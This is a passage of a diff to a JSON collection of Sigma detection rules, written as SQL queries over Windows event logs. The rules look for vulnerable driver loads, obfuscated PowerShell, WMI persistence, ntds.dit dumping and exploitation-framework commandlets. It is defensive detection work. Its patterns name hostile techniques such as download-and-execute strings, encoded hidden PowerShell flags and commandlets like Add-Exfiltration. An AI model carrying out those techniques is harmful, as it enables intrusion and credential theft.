ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\')" ], - "filename": "win_system_service_install_pdqdeploy.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", - "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" - ], - "filename": "win_system_hack_smbexec.yml" - }, - { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" - ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" - }, - { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" - ], - "filename": "win_system_apt_oilrig_mar18.yml" - }, - { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" + "attack.t1546.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE EventID IN ('19', '20', '21')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "status": "experimental", - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of the tool" + "App-V clients" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", - "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", - "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "status": "experimental", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", @@ -4177,1440 +3981,1493 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + "Legitimate use of the library for administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Legitimate use remote PowerShell sessions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", - "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", - "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' 